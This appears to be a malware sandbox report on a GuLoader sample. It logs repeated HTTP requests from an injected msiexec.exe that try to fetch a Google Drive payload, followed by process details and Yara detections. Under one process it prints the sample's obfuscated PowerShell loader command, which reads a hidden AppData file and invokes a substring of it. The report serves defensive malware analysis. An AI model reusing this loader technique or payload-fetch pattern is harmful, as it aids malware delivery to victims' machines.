                                                      2025-01-11 02:17:37 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:37 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:37 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-wVQPWorCOS0KGdC88VImjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.549989142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:38 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:38 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRHqp08SDusrAvxzqPEugMM44tLvkHeOB6QXbgYrY_BQ91REBLvE_JtalOvp3-7mvszGS5bfmI
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:38 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-8g1PnmWGX8s8lkJTF921_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:17:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 64 44 77 52 35 36 53 51 59 79 5f 75 32 30 54 68 50 30 46 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vdDwR56SQYy_u20ThP0FlA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.549990142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:49 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:49 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:49 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-rlYp4vNqBEN4V9lmhV7Jww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.549991142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:50 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:50 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC5ggt55otF4mvHeChavS71h3yqN2Xgewg4rrAnjhlN1_xAhXXRC_6SeFSi76ksB3HQo
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:50 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-iT7cvJbWC2iwlVj_fhVb4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:17:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 5a 69 51 56 70 61 69 59 59 35 53 63 77 37 63 36 32 71 33 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4ZiQVpaiYY5Scw7c62q3AQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.549992142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:18:01 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:18:02 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:18:01 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-vmeWVvMdJEcreYWH8DUfIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.549993142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:18:02 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:18:03 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSaxhjjy_9QviH_6eZx1RuSqAAejoRu1NhOlsq0am4EtRK7PDLeoe09t7XP5L6ezp1J
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:18:02 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-6AUEKOB3XJEx_fANsmefXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:18:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 73 65 5a 69 73 73 41 70 30 36 45 51 45 54 36 45 57 66 77 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iseZissAp06EQET6EWfwtQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.549994142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:18:13 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:18:14 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:18:14 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-9XXsio6k1GxYKzt76mMi7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:21:15:07
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\ro7eoySJ9q.exe"
                                                      Imagebase:0x400000
                                                      File size:1'060'792 bytes
                                                      MD5 hash:69C59075BC9FFD11BF75080CFE44F29E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:21:15:12
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)"
                                                      Imagebase:0x9a0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2707883561.000000000985B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:21:15:12
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:21:16:08
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0x7ff6068e0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3928284936.000000000461B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:22.3%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:21.7%
                                                        Total number of Nodes:1267
                                                        Total number of Limit Nodes:30
